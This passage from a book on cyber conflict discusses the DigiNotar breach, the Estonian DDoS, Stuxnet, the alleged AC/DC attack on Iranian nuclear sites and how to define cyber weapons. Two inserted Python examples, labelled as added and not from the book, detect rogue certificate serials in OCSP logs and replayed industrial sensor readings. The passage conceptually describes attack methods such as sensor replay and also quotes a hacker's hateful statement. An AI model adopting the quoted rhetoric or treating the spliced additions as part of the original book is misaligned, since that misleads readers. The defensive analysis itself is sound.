the murder of more than 8,000 Muslims in Srebrenica in 1995 during the Bosnian War:

When Dutch government, exchanged 8000 Muslim for 30 Dutch soldiers 
and Animal Serbian soldiers killed 8000 Muslims in same day, Dutch 
government have to pay for it, nothing is changed, just 16 years has been 
passed. Dutch government’s 13 million dollars which paid for DigiNotar 
will have to go directly into trash, it’s what I can do from KMs [kilometers] 
away! It’s enough for Dutch government for now, to understand that 1 
Muslim soldier worth 10000 Dutch government. 46 
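The OCSP detail above is what made the scale of the spying visible after the fact: every status request tells the responder which host is using which certificate when. The following is an added example, not from the book or from the official investigation, of two checks a certificate authority can run over its own responder logs: serials that clients ask about but the CA never recorded issuing, and a day on which a serial’s unique-client count surges. The log lines, the issuance record and the serials are constructed placeholders.

```python
"""Added example (not from the book or the official investigation): two
defender-side checks over a CA's own OCSP responder log. All log lines,
serials and the issuance record are constructed."""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed OCSP responder log: timestamp, client IP, serial asked about,
# and the status the responder returned.
OCSP_LOG = """\
2011-07-27 09:10:11 203.0.113.5 serial=0x1003 status=good
2011-07-27 09:12:40 203.0.113.6 serial=0x2001 status=good
2011-07-28 11:00:02 203.0.113.7 serial=0x2001 status=good
2011-08-04 08:00:01 198.51.100.10 serial=0x1003 status=good
2011-08-04 08:00:02 198.51.100.11 serial=0x1003 status=good
2011-08-04 08:00:03 198.51.100.12 serial=0x1003 status=good
2011-08-04 08:00:04 198.51.100.12 serial=0x1003 status=good
2011-08-04 08:00:05 198.51.100.13 serial=0x1003 status=good
2011-08-04 08:00:06 198.51.100.14 serial=0x1003 status=good
2011-08-04 08:00:07 198.51.100.15 serial=0x1003 status=good
2011-08-04 09:30:00 203.0.113.8 serial=0x2001 status=good
2011-08-04 09:31:00 203.0.113.9 serial=0x2001 status=good
"""

# Constructed issuance record: every serial the CA's own systems know about.
ISSUED_SERIALS: Set[str] = {"0x2001", "0x2002"}

LINE_RE = re.compile(r"^(\S+) \S+ (\S+) serial=(\S+) status=\S+$")


def parse_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (date, client_ip, serial) tuples, skipping malformed lines."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append((m.group(1), m.group(2), m.group(3)))
    return entries


def unknown_serials(entries, issued: Set[str]) -> Set[str]:
    """Check 1: serials clients ask about that the CA never recorded
    issuing. Each one is a certificate that exists outside the CA's books."""
    return {serial for _, _, serial in entries if serial not in issued}


def daily_unique_clients(entries) -> Dict[str, Dict[str, int]]:
    """Unique client IPs per serial per day. Because OCSP tells the
    responder which host is using which certificate when, this is a rough
    head count of a certificate's relying parties."""
    seen: Dict[str, Dict[str, Set[str]]] = defaultdict(lambda: defaultdict(set))
    for date, ip, serial in entries:
        seen[serial][date].add(ip)
    return {s: {d: len(ips) for d, ips in days.items()} for s, days in seen.items()}


def surges(daily: Dict[str, Dict[str, int]], factor: int = 3, minimum: int = 5):
    """Check 2: flag a day whose unique-client count is at least `minimum`
    and at least `factor` times the busiest earlier day for that serial."""
    flagged = []
    for serial, days in daily.items():
        busiest_so_far = 0
        for date in sorted(days):
            count = days[date]
            if count >= minimum and count >= factor * max(busiest_so_far, 1):
                flagged.append((serial, date, count))
            busiest_so_far = max(busiest_so_far, count)
    return flagged


def analyse(text: str = OCSP_LOG):
    """Run both checks over a log and return (unknown serials, surges)."""
    entries = parse_log(text)
    return unknown_serials(entries, ISSUED_SERIALS), surges(daily_unique_clients(entries))


if __name__ == "__main__":
    unknown, flagged = analyse()
    print("serials never issued by the CA:", sorted(unknown))
    for serial, date, count in flagged:
        print(f"surge: serial {serial} on {date}: {count} unique clients")
```

In the constructed log the rogue serial fails both checks: it is absent from the issuance record, and its unique-client count jumps from one to six between 27 July and 4 August. A real responder log would be larger, and the first check in particular depends on the issuance database itself not having been tampered with during the intrusion.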

This justification is somewhat dubious. It is more likely that DigiNotar simply offered “low-hanging fruit,” a term malware experts often use when referring to easy-to-pick and obvious targets. An audit immediately after the hack found that the compromised firm lacked even basic protection: it had weak passwords and lacked anti-virus protection and even up-to-date security patches. What the industry calls “bad hygiene” enabled the consequential breach. As late as 30 August, F-Secure, a cutting-edge Finnish security firm, discovered several defacements to less often visited parts of DigiNotar’s website, some of which were more than two years old and related to older hacks committed by other groups. 47 It is therefore likely that DigiNotar had a reputation for being an easy target among hackers. The question of whether or not the hacker acted on his own initiative is of secondary importance. The online vigilante openly admitted that he shared his information with the Iranian government. “My country should have control over Google, Skype, Yahoo, etc.,” the alleged Comodo Hacker told The New York Times by email. “I’m breaking all encryption algorithms and giving power to my country to control all of them.” It is highly likely that the spying surge after 4 August was the result of Iranian government agencies or their representatives, possibly ISPs, spying on unsuspecting citizens using Gmail, an email service popular among techy users for its high security standards.

The DigiNotar case offers a triple example of how cyber attacks can undermine trust: first, the trust in the Dutch certificate authority DigiNotar was fatally destroyed, leading straight to bankruptcy for the company. Secondly, because the Dutch government relied on the company’s credibility, its own trustworthiness received a temporary hit, which the Ministry of the Interior tried to limit by being transparent about the crisis.

A second example also involves a joint public-private target set, the infamous cyber attacks against Estonia’s government and some private sector companies in May 2007. The perpetrators, likely Russians with a political motivation, most certainly did not anticipate the massive response and high public visibility that their DDoS attacks received. Estonia’s political leadership was taken aback by the attack and scrambled for an appropriate response, both practical and conceptual. “The attacks were aimed at the essential electronic infrastructure of the Republic of Estonia,” said Jaak Aaviksoo, then Estonia’s new minister of defense:

All major commercial banks, telcos, media outlets, and name servers—the phone books of the Internet—felt the impact, and this affected the majority of the Estonian population. This was the first time that a botnet threatened the national security of an entire nation. 48 

One of the questions on Aaviksoo’s mind at the time was if he should try to invoke Article 5 of the North Atlantic Treaty, which guarantees a collective response to an armed attack against any NATO country. Ultimately that was not an option as most NATO states did not see a cyber attack as an “armed attack,” not even in the heat of the three-week crisis. “Not a single Nato defence minister would define a cyber-attack as a clear military action at present,” Aaviksoo conceded, adding: “However, this matter needs to be resolved in the near future.” 49 One Estonian defense official described the time leading up to the launch of the attacks as a “gathering of botnets like a gathering of armies.” 50 Other senior ministers shared his concern. Estonia’s foreign minister at the time of the attack was Urmas Paet. From the start, he pointed the finger at the Kremlin: “The European Union is under attack, because Russia is attacking Estonia,” he wrote in a statement on 1 May 2007, and added: “The attacks are virtual, psychological, and real.” 51 Ansip, the prime minister, was already quoted above: “What’s the difference between a blockade of harbors or airports of sovereign states and the blockade of government institutions and newspaper web sites?” 52 Ene Ergma, the speaker of the Estonian parliament with a PhD from Russia’s Institute of Space Research, preferred yet another analogy. She compared the attack to the explosion of a nuclear weapon and the resulting invisible radiation. “When I look at a nuclear explosion and the explosion that happened in our country in May,” Ergma told Wired magazine, referring to the cyber attack, “I see the same thing. Like nuclear radiation, cyber warfare doesn’t make you bleed, but it can destroy everything.” 53 The panic was not confined to the small Baltic country. In the United States, hawkish commentators were alarmed at what they saw as a genuine, new, and highly dangerous threat. Ralph Peters, a retired Army intelligence officer and prolific hawkish commentator, published a red-hot op-ed in Wired two months after the Estonia attack. He accused the Department of Defense of underestimating a novel and possibly devastating new threat: 

[T]he Pentagon doesn’t seem to fully grasp the dangerous potential of this 
new domain of warfare. If you follow defense-budget dollars, funding still 
goes overwhelmingly to cold war era legacy systems meant to defeat Soviet 
tank armies, not Russian e-brigades. 54 

The United States could face a devastating surprise attack, Peters held, 
an attack that could make Pearl Harbor look like “strictly a pup-tent 
affair,” he wrote, borrowing an expression from Frank Zappa’s song 
“Cheepnis.” 

In hindsight, these comparisons and concerns may appear overblown and out of sync with reality. But they should not be dismissed as hyperbole too easily. Aaviksoo’s and Ansip’s and Peters’s concerns were genuine and honest—they are expressions of a successful erosion of trust in previous security arrangements. It is important to point out—especially against the background of all these martial analogies—that both the DigiNotar hack and the Estonian DDoS were non-violent. Yet they effectively undermined public trust in a company and in a country’s ability to cope with a new problem. In the one case the erosion of trust was terminal (DigiNotar filed for bankruptcy); in the other case it was temporary; a few years after the attack Estonia had better defenses, better staff, and excellent skills and expertise on how to handle a national cyber security incident. 

Therefore, thirdly, examining the only possibly violent cyber attack to have taken place in the wild—Stuxnet—is instructive. 55 Even this one cyber attack that created a certain amount of physical destruction, albeit directed against technical equipment, had a strong psychological element. It was intended to undermine trust, the trust of scientists in their systems and in themselves, and the trust of a regime in its ability to succeed in its quest for nuclear weapons. When Stuxnet started successfully damaging the Iranian centrifuges, the Iranian operators did not know what was happening for more than two years. The operation started long before Barack Obama was sworn in as president in January 2009, possibly as early as November 2005. Independent security companies would discover the malicious code only in June 2010. The original intention was to cause physical damage to as many of the Iranian centrifuges as possible. But the American-Israeli attackers probably knew that the physical effect could be exploited to unleash a much more damaging psychological effect: “The intent was that the failures should make them feel they were stupid, which is what happened,” an American participant in the attacks told The New York Times. 56 The rationale was that once a few machines failed, the Iranian engineers would shut down larger groups of machines, so-called “stands” that connected 164 centrifuges in a batch, because they distrusted their own technology and would suspect sabotage in all of them. In the International Atomic Energy Agency, a powerful UN watchdog organization based in Vienna, rumors circulated that the Iranians had lost so much trust in their own systems and instruments that the management in Natanz, a large nuclear site, had taken the extraordinary step of assigning engineers to sit in the plant and radio back what they saw to confirm the readings of the instruments. 57 Such confusion would be useful to the attackers: “They overreacted,” one of the attackers revealed, “And that delayed them even more.” 58 The Iranians working on the nuclear enrichment program began to assign blame internally, pointing fingers at each other, even firing people. Stuxnet, it turned out, was not a stand-alone attack against the self-confidence of Iranian engineers. It is important to note that the Stuxnet operation was probably designed to remain entirely clandestine. The best trust-eroding effect would have been achieved if Iran’s engineers and leaders had not realized that their work was being sabotaged at all. The most effective cyber attacks may be those that remain entirely secret. 

A most curious follow-on cyber assault occurred on 25 July 2012, and provides an insightful fourth example of undermining trust. A rather unusual type of attack struck two of Iran’s uranium enrichment plants: some computers shut down, while others played “Thunderstruck,” an aggressive and energetic song by the Australian rock band AC/DC. An Iranian scientist based at the Atomic Energy Organization of Iran, AEOI in short, had taken the initiative and reached out to Mikko Hypponen, the prominent and highly respected head researcher of the Finland-based anti-virus company F-Secure. Hypponen confirmed that the emails came from within the AEOI: 

I am writing you to inform you that our nuclear program has once again 
been compromised and attacked by a new worm with exploits which have 
shut down our automation network at Natanz and another facility Fordo 
near Qom. 59 

F-Secure couldn’t confirm any details mentioned in the email. The anonymous Iranian scientist apparently quoted from an internal email that the organization’s “cyber experts” had sent to the teams of scientists. The email mentioned a common tool for finding vulnerabilities and developing exploit code, Metasploit, and that the mysterious attackers allegedly had access to the AEOI’s virtual private network (VPN). The attack, the scientist volunteered, shut down “the automation network and Siemens hardware.” He then revealed the most curious element that hundreds of media articles had seized on after Bloomberg first reported the news of the email published on F-Secure’s blog: 

There was also some music playing randomly on several of the workstations during the middle of the night with the volume maxed out. I believe it was playing “Thunderstruck” by AC/DC. 60 

Some caution is in order. The only report from the episode comes from an Iranian scientist who volunteered this information to an anti-virus company. It is also unclear if the attack should be seen as the latest incident in a series of US-designed cyber attacks that may have started with Stuxnet. At first glance, literally blasting an attack in the face of the Iranian engineers stands in stark contrast to clandestine attacks like Stuxnet or Flame, which were sophisticated pieces of spying software— 
but then, maybe the attackers didn’t expect news of the AC/DC blast to leak out, embarrassing the Iranians publicly. So either way it was not a surprise when Pereydoun Abbasi, the head of the AEOI, disputed the attack a few days later: “Who seriously believes such a story? It is baseless and there has never been such a thing,” Abbasi said in a statement to the Iranian ISNA news agency. 61 The story may well be a hoax. But it should not be dismissed out of hand. AC/DC, after all, seem to be a favorite soundtrack for American warriors in battle; during the war in neighboring Iraq in 2004, for example, the Marines blasted into Fallujah to the loud riffs of AC/DC’s “Hells Bells.” 62 It would be plausible to assume that the operation was part of a larger psychological campaign of attrition, designed to undermine the Iranian engineers’ trust in their systems, their skills, and their entire project, in a blow-by-blow fashion. News consumers in Europe or the United States may not seriously believe such a story—but Abbasi’s engineers, if it happened, would certainly wonder what else the mysterious attackers were able to do, after yet another entirely unpredicted attack hit their systems. 

Violence administered through weaponized code, in sum, is limited in several ways: it is less physical, because it is always indirect. It is less emotional, because it is less personal and intimate. The symbolic uses of force through cyberspace are limited. And, as a result, code-triggered violence is less instrumental than more conventional uses of force. Yet, despite these limits, the psychological effects of cyber attacks, their utility in undermining trust, can still be highly effective. 

This chapter opened by asking if the Israeli cyber attack on the Syrian air defense system in August 2007 was violent or not. Against the background of this analysis, the answer is clear: it was not violent. Only the combined airstrike on the soon-to-be-finished nuclear reactor was violent. But the cyber attack on its own achieved two effects that previously would have required a military strike: first, it neutralized the threat of the Syrian air defense batteries. This was a significant achievement that enabled a stealthier and possibly faster and more successful air incursion. But the second effect is possibly even more significant: the cyber attack helped undermine the Syrian regime’s trust in its own capabilities and the belief that it could defend its most critical installations against future Israeli attacks. Bashar al-Assad’s government subsequently decided not to restart Syria’s enrichment program, so this second less tangible result may have had the more sustainable effect. 

In the days and hours leading up to the afternoon of 19 March 2011, air force planners in France, Britain, and several other NATO countries were frantically preparing an imminent bombing campaign against military targets in Libya. In Washington on that same March weekend an unusual discussion took place between the Department of Defense and the White House. Should America deploy its cyber arsenal against Libya’s air defense system? 1 After the Pentagon’s generals and geeks had briefed the president on the options, he ultimately decided that the time was not ripe for cyber weapons. 

This behind-the-scenes episode is part of a much larger debate about offensive cyber weapons. In September 2011, William Lynn, the US Deputy Secretary of Defense, warned, “If a terrorist group does obtain destructive cyberweapons, it could strike with little hesitation.” 2 In January 2012, the Department of Defense announced its plans to equip America’s armed forces for “conducting a combined arms campaign across all domains—land, air, maritime, space, and cyberspace.” 3 To counter a novel arms race, China and Russia, among others, have suggested discussing forms of “cyber arms control” to restrict new forms of military conflict in cyberspace. 

But the debate and those trying to turn it into policy are getting ahead of themselves. Some fundamental questions on the use of force in cyberspace are still unanswered; worse, they are still unexplored: what are cyber “weapons” in the first place? How is weaponized code different from physical weapons? What are the differences between various cyber attack tools? And do the same dynamics and norms that govern the use of weapons on the conventional battlefield apply in cyberspace? 

Cyber weapons span a wide spectrum. That spectrum, this chapter argues, reaches from generic but low-potential tools to specific but high-potential weaponry. A didactically useful comparison helps illustrate this polarity. Low-potential “cyber weapons” resemble paintball pistols: they may be mistaken for real weapons, they are easily and commercially available, used by many to “play,” and getting hit is highly visible—but at closer inspection these “weapons” will lose some of their threatening character. High-potential cyber weapons could be compared with sophisticated fire-and-forget weapon systems such as modern anti-radar missiles: they require specific target intelligence that is programmed into the weapon system itself, notable investments for R&D, significant lead-time, and while they open up entirely new tactics they also create novel limitations. This distinction brings into relief a two-pronged hypothesis that stands in stark contrast to some of the debate’s received wisdoms. Maximizing the destructive potential of a cyber weapon is likely to come with a double effect: it will significantly increase the resources, intelligence, and time required to build and to deploy it—and increasing a cyber weapon’s potential is likely to decrease significantly the number of targets, the risk of collateral damage, and the coercive utility of cyber weapons. 

The chapter’s argument is presented in three steps. The chapter begins by outlining what cyber weapons are in conceptual terms. Then I suggest a way to class cyber attack tools by discussing the most important empirical cases on record. Thirdly the chapter explores why even some sophisticated and effective instruments of electronic attack cannot sensibly be called a cyber weapon. The chapter closes by pointing out how cyber weapons confront us with three problems. These three problems will largely define the future development and use of weaponized code. 

Weapons are, simply put, instruments of harm. Since the dawn of time, humans have used weapons to hunt prey and each other. Weapons range from the nuclear warhead to the bare human body trained in martial arts, their utility ranging from destroying an entire city to protecting one single person. Yet practitioners as well as scholars often seem to take the meaning of the term “weapon” for granted. Remarkably, even the US Department of Defense Dictionary of Military and Associated Terms, an authoritative 550-page compendium that defines anything from abort to Zulu time, has no definition for weapon, let alone for cyber weapon. 4 For the purposes of this book, a weapon can be defined as a tool that is used, or designed to be used, with the aim of threatening or causing physical, functional, or mental harm to structures, systems, or living things. This general definition is an essential building block for developing a more precise understanding of cyber weapons. 

The term cyber weapon is much broader than cyber war. Cyber war is a highly problematic, even a dangerous, concept. An act of war must be instrumental, political, and potentially lethal, whether in cyberspace or not. 5 No stand-alone cyber offense on record meets these criteria, so “cyber war” remains a metaphor for the time being. Not so in the case of cyber weapons. Weapons are not just used in war. Arms are used for a wide range of purposes: to threaten others, for self-defense, to steal, to protect, to blackmail, to police, to break into buildings, to enforce the law, to flee, to destroy things, and even to train, to hunt, and for sports and play. Weapons, of course, may also be used to make war, and some more complex weapons systems are exclusively developed for that purpose, for instance warships or anti-aircraft guns. But most weapons are neither designed for warfare nor used in wars. This is true also for cyber weapons. Therefore, while it is counterproductive and distracting to speak about cyber war, it can be productive and clarifying to speak about cyber weapons. Yet conceptual precision remains a problem—“There is currently no international consensus regarding the definition of a ‘cyber weapon’,” lamented the Pentagon in November 2011, elegantly distracting from the problem that there is no consensus inside the DoD either. 6 For the purposes of this book, a cyber weapon is seen as a subset of weapons more generally: as computer code that is used, or designed to be used, with the aim of threatening or causing physical, functional, or mental harm to structures, systems, or living beings. 

A psychological dimension is a crucial element in the use of any weapon, but especially so in the case of a cyber weapon, in two ways: the first psychological dimension is the offender’s intention to threaten harm or cause harm to a target. An instrument may be expressly designed as a weapon, like a rifle, or repurposed for use as a weapon, as in using a hammer to threaten or hit somebody. 7 Simple as well as complex products can be used both for peaceful purposes and as arms. In the case of sole-purpose weapon systems as well as in the case of repurposed items, a tool is actually used as a weapon when an actor is intending to use it as such; whether harm is successfully inflicted or not is of secondary concern. A rifle, for instance, may be used to threaten; it may malfunction; or the bullet may miss the target. But in all cases the arm has been used because an attacker was intending to use it as such in a given situation. 

The same logic applies to cyber weapons. An illustration of this is a remarkable event that took place at the Sayano-Shushenskaya hydroelectric plant in Russia. Keith Alexander, a general at the head of America’s National Security Agency as well as of US Cyber Command, used the incident in a speech to highlight the potential risks of cyber attacks. 8 With a height of 245 meters and a span of 1 kilometer, the Shushenskaya dam is the largest in Russia, holding back the mighty Yenisei River in Khakassia in south-central Siberia. 9 Shortly after midnight GMT on 17 August 2009, a 940-ton turbine, one of ten 640 megawatt turbines at the plant, was ripped out of its seat by a so-called water hammer, a sudden surge in water pressure, which then caused a transformer explosion. The turbine’s unusually high vibrations had eventually worn down the bolts that kept its cover in place. Seventy-five people died in the accident, energy prices in Russia rose, and rebuilding the plant will cost $1.3bn. The ill-fated turbine 2 had been malfunctioning for some time and the plant’s management was poor, but the key event that ultimately triggered the catastrophe seems to have been a fire at Bratsk power station, about 500 miles away. Because the energy supply from Bratsk dropped, the authorities remotely increased the burden on the Shushenskaya plant. The sudden spike overwhelmed turbine 2, which at twenty-nine years and ten months had nearly reached the end of its predicted lifecycle of thirty years. 10 The incident would have been a powerful example of the use of a cyber weapon if intruders had intentionally caused the plant’s crash through a remote command (although to plan such an attack they would have required remarkably detailed advance knowledge of the plant’s long-standing maintenance deficiencies). But such an intention was absent. Intention may be the only line separating the attack from an accident. 

A second psychological dimension comes into play if a weapon is used as a threat, or if its use is announced or anticipated: the target’s perception of the weapon’s potential to cause actual harm. It is important to note that the attacker may use a weapon as a threat, which may achieve the objective without actually inflicting physical harm; or the attacker may use the weapon to cause harm instantly, without threatening to do so first. Furthermore, a victim’s estimation of a weapon’s potential to harm is different from a victim’s estimation of an attacker’s potential to harm. To illustrate all this, a fictional scenario is useful: suppose an armed robber enters a bank and threatens the clerk with a paintball pistol; both the clerk and the robber assume that the paintball pistol is real and loaded with live bullets; money is handed over; the robber flees. Has a weapon been used? Arguably the answer is yes. This fictitious scenario is less anomalous than it may seem; it merely affords starker contrasts. The history of domestic and international armed confrontations offers plenty of examples where the aggressor’s power to cause injury was vastly overestimated, both by the defender as well as by the aggressor. 11 The paintball pistol scenario inevitably leads to a seeming paradox: suppose the bank clerk noticed that the robber’s pistol could only shoot paintballs. Would it still be a weapon? The answer is no. The fake firearm would have lost its threatening character and have thus ceased to be a weapon, even if the robber still believed it to be real. The conclusion: a weapon’s utility critically depends on the perception of the threatened party. In every real armed confrontation, both the victim and the aggressor will hold crude theories of an arm’s capability to inflict harm and their own ability to withstand or absorb this harm. These subjective estimates will necessarily vary in their accuracy when put to a violent test. The actual weapon may be more or less powerful than assumed. In the case of cyber weapons, this discrepancy is especially large: publicly known cyber weapons have far less firepower than is commonly assumed. 

Cyber weapons can be grouped along a spectrum: on the generic, low-potential end of the spectrum is malicious software—malware—that is able to influence a system merely from the outside but which is technically incapable of penetrating that system and creating direct harm—resembling the proverbial paintball pistol. On the specific, high-potential end of the spectrum is malware able to act as an intelligent agent—capable of penetrating even protected and physically isolated systems and autonomously influencing output processes in order to inflict direct harm, thus resembling the proverbial fire-and-forget smart-bomb. In between are malicious intrusions that include generic system penetrations incapable of identifying and influencing a targeted process, but also targeted and specific intrusions capable of creating functional and even physical damage. 

On the low-potential end of the spectrum is the paintball pistol effect. Software used to generate traffic to overload a server, for instance, is not strictly speaking physically or functionally damaging a living being, a structure, or a system; it is only temporarily slowing down or shutting down a system, without damaging it directly and immediately. Denial of service (DoS) attacks are easy to mount and relatively easy to defend against, but they are also highly visible—and for those who find themselves for the first time at the receiving end of an attack that is distributed for better effect across multiple attacking machines the experience can be distressing, and it may well create mental harm and even second-order damage: a persistent high-volume Distributed Denial of Service (DDoS) attack which may bring down a bank’s website for an extended period of time; defaced websites which may seriously damage an organization’s reputation; and espionage or intellectual property theft that can put a company in a less advantageous market position. But these forms of damage are second-order effects, not direct damage inflicted by a cyber weapon. 12 At closer inspection, the “weapon” ceases to be a weapon. 

One example is Estonia’s reaction to a large DDoS attack in late April 
2007, which was discussed earlier. The real-life effect of the Russian- 
coordinated online protests on business, government, and society was 
noticeable, but ultimately it remained relatively minor. Yet at the time, 
Estonian officials and citizens were genuinely scared by the attack. 

At the opposite, high-potential end of the spectrum is the proverbial fire-and-forget missile. A useful military analogy is the high-speed anti-radar missile, usually shortened to HARM, initially produced by Texas Instruments, and which is one of the most widely deployed anti-radar weapons worldwide. The missile’s critical innovation is a seeker that includes an intelligent, programmable video processor, designed to recognize characteristic pulse repetition frequencies of enemy radars. This means that the weapon can be launched into a certain area where it then searches for suitable target radars, discriminating between friendly and hostile radar by band. Once an emitter is identified as hostile, the missile software’s decision logic will allow it to select the highest value target and home to impact. The missile can be seen as an intelligent agent. In computer science, intelligent agents are autonomous software entities that are able to assess the environment they find themselves in, and which are capable of reacting autonomously in order to achieve a predefined goal. Such a quality is necessary to attack the most highly prized targets. 

The proverbial HARM missile contrasts with proverbial paintball pistols in at least five important ways. Firstly, its objective is not just interrupting traffic at a system’s ports facing the public, but getting inside and penetrating a system. Secondly, its objective is not just penetrating any system that happens to be vulnerable (“low-hanging fruit” in geek jargon) but specific systems of particular interest. Thirdly, these systems are likely to be better protected. For any cyber attacker with the goal of causing physical damage, the prime targets are likely to be industrial processes, public utilities, and civilian as well as military telecommunication networks. The computerized control systems in such installations tend to be better secured than less critical systems. Fourthly, if the goal of a stand-alone cyber attack is physical damage, rather than just enabling a conventional strike, then the target itself has to come equipped with a built-in potential for physical harm. Weaponized code, quite simply, doesn’t come with an explosive charge, as chapter two explored in detail. Potential physical damage will have to be created by the targeted system itself, by changing or stopping ongoing processes. Finally, an attack agent’s objective is likely to be not just shutting down a penetrated system, but subtly influencing ongoing processes in order to achieve a specific malicious goal. Merely forcing the shutdown of one industrial control system may have the undesirable effect that a fail-safe mechanism or a backup system kicks in, or operators start looking for the bug. To work as an effective weapon, the attack software may have to influence an active process in a malicious way, and if the malicious activity extends over a certain period of time this should be done in a stealthy way as well. But stealthily or overtly influencing an active process is far more complicated than just hitting the virtual off-button. Three real-world examples of weaponized code illustrate this. 

In a first, contested 13 example, the CIA may have rigged the control system of a Soviet pipeline in order to cause a major explosion. The powerful 1982 explosion was not caused by a system shutdown, but by deliberately creating overpressure in a gas pipeline by manipulating pressure-control valves in an active control process. A second example is the Israeli cyber attack that was designed to blind the Syrian air defense system. The goal was not just to shut down the entire air-defense radar station—this would have been suspicious and could have triggered an alarm or investigation—but to trick the active system to display no approaching airplanes to its operators for a limited time. Thirdly, and most famously, the worm that sabotaged Iran’s nuclear program didn’t just shut down the centrifuges at Natanz. Before Stuxnet started sabotaging ongoing processes, it intercepted input values from sensors, for instance the state of a valve or operating temperatures, recorded these data, and then provided the legitimate controller code with prerecorded fake input signals, while the actual processes in the hidden background were manipulated. 
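The sensor-replay technique just described (record genuine input values, then feed the legitimate controller prerecorded readings while the real process is manipulated) has a defensive counterpart: replayed telemetry looks implausibly familiar, and it disagrees with what an independent observer sees. The following Python example is added here as an illustration and is not code from the book or from any published Stuxnet analysis. The reading stream, the window size, the tolerance and the out-of-band observations are all constructed; the two checks it implements are an exact-repeat test (a noisy physical process almost never reproduces an earlier window of readings bit for bit) and a cross-check of reported values against an independent observation, which is the automated form of the Natanz engineers radioing back what they saw on the floor.

```python
"""Detect replayed sensor telemetry in a constructed PLC reading stream.

Constructed example (not from the book or any real plant): a stream of
centrifuge-speed readings in Hz. A replay attack, as the book describes for
Stuxnet, records a window of genuine readings and feeds those recorded values
back to the controller while the physical process diverges. Two defensive
checks are shown:

1. Window-repeat check: real sensor noise makes an exact repeat of an earlier
   window of WINDOW readings vanishingly unlikely; such a repeat is a replay
   indicator.
2. Out-of-band cross-check: compare the reported values against readings
   observed independently (a local gauge, an operator on the floor) and flag
   divergence beyond a tolerance.
"""
from typing import Dict, List, Optional, Tuple

WINDOW = 8  # consecutive samples that must match exactly to count as replay

# Constructed genuine readings: nominal ~1064 Hz with small sensor jitter.
GENUINE: List[float] = [
    1064.0 + d
    for d in (0.3, -0.2, 0.1, 0.4, -0.5, 0.2, 0.0, -0.1,
              0.3, 0.5, -0.3, 0.1, 0.2, -0.4, 0.0, 0.1)
]

# Constructed replayed stream: the 16 genuine samples, after which the first
# WINDOW samples are fed back to the controller verbatim while the real rotor
# speed is being driven up in the background.
REPLAYED: List[float] = GENUINE + GENUINE[:WINDOW]

# Constructed out-of-band observations covering the last WINDOW samples: what
# an independent gauge shows while the controller is being shown stale data.
OUT_OF_BAND: List[float] = [1064.0 + 20.0 * i for i in range(1, WINDOW + 1)]


def find_replayed_window(stream: List[float],
                         window: int = WINDOW) -> Optional[Tuple[int, int]]:
    """Return (earlier_start, later_start) for the first window of readings
    that exactly repeats an earlier window in the stream, or None.

    Exact floating-point equality is deliberate: a replay copies the recorded
    values, so they match bit for bit, whereas live jitter does not.
    """
    seen: Dict[Tuple[float, ...], int] = {}
    for start in range(len(stream) - window + 1):
        key = tuple(stream[start:start + window])
        if key in seen:
            return seen[key], start
        seen[key] = start
    return None


def cross_check(reported: List[float], observed: List[float],
                tolerance: float = 2.0) -> List[int]:
    """Return the indices where a reported reading differs from the
    independently observed reading by more than `tolerance` (constructed
    units: Hz). An empty list means the two sources agree."""
    return [i for i, (r, o) in enumerate(zip(reported, observed))
            if abs(r - o) > tolerance]


if __name__ == "__main__":
    print("genuine stream repeat:", find_replayed_window(GENUINE))
    print("replayed stream repeat:", find_replayed_window(REPLAYED))
    print("divergent samples:", cross_check(REPLAYED[-WINDOW:], OUT_OF_BAND))
```

On the constructed input the genuine stream yields no repeat, the replayed stream reports that the window starting at sample 16 is a copy of the window starting at sample 0, and every one of the last eight reported values disagrees with the out-of-band observation. In a real plant the window length and tolerance must be tuned to the sensor's actual noise floor, and the out-of-band source has to be genuinely independent of the network path the attacker controls; otherwise the second check merely compares the forged value with itself.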

The two latter examples need to be examined in some detail (the pipeline explosion was already covered in chapter one). The use of weaponized code may happen in conjunction with conventional military force or may be stand-alone. One of the most spectacular examples of a combined strike is Operation Orchard, Israel’s bombing raid on a nuclear reactor site at Dayr ez-Zor in Northern Syria on 6 September 2007. It appears that the Israeli Air Force prepared for the main attack by taking out a single Syrian radar site at Tall al-Abuad close to the Turkish border. The Israeli attackers combined electronic warfare with precision strikes. The Syrian electrical grid was not affected. Syria’s air-defense system, one of the most capable in the world, went blind and failed to detect an entire Israeli squadron of F-15I and F-16I warplanes entering Syrian airspace, raiding the site, and leaving again. 14 Before-and-after satellite pictures of the targeted site on the Euphrates were made public by the US government. They show that the nascent nuclear facility and its suspected reactor building, which were located about 145 kilometers from Iraq, had been reduced to rubble. The coding work for the operation was probably done by Unit 8200, the largest unit in the IDF and Israel’s equivalent of the NSA. 15 The technicians may have used a so-called “kill switch” embedded in the air-defense system by a contractor to render it useless. 16 The details of the operation remain classified, and therefore unconfirmed. But one thing should be highlighted here: the network attack component of Operation Orchard was probably critical for the success of the Israeli raid, and although the cyber attack did not physically destroy anything in its own right, it should be seen as an integrated part of a larger military operation. While the cyber attack on its own—without the military component—would have constituted neither an act of war nor an armed attack, it was nevertheless an enabler for a successful military strike. That was different in another, even more spectacular recent incident. 

Stuxnet is by far the most sophisticated known cyber attack to date. It was a highly directed attack against a specific target, Iran’s nuclear enrichment program at Natanz. The worm was an act of cyber-enabled stand-alone sabotage that was not connected to a conventional military operation. The US government’s internal codename for the operation was “Olympic Games.” But that name became known only after independent researchers had discovered and analyzed the malware’s code for many months, usually discussing the threat under the name Stuxnet. Stuxnet caught on, and therefore this book sticks to the unofficial but publicly better-established name (it is also more elegant). There is reason to believe that Olympic Games was the codename for a larger program that included more than just the Stuxnet attack. It was probably part of a bigger operation that included at least one other publicly known piece of intrusion software. What is certain is that Stuxnet was a multi-year campaign. The program appears to span nearly seven years, from November 2005 to June 2012. 17 It is likely that the main attack had been executed between June 2009 and June 2010, when IT security companies first publicly mentioned the worm. Stuxnet recorded a timestamp and other system information. Therefore engineers were able, in months of hard work, to outline the worm’s infection history as well as to reverse-engineer the threat and to understand its purpose. The following paragraphs are intended to provide a glimpse into Stuxnet’s complexity and sophistication.

The sabotage software was specifically written for industrial control systems. These control systems are box-shaped stacks of hardware without keyboards or screens. A Programmable Logic Controller, or PLC, runs the control system. An industrial plant’s operators have to program the controllers by temporarily hooking them up to a laptop, most likely a so-called Field PG, a special industrial notebook sold by Siemens. These Field PGs, unlike the control system and the controller itself, run Microsoft Windows and were most likely not connected to the Internet or even to an internal network. 18

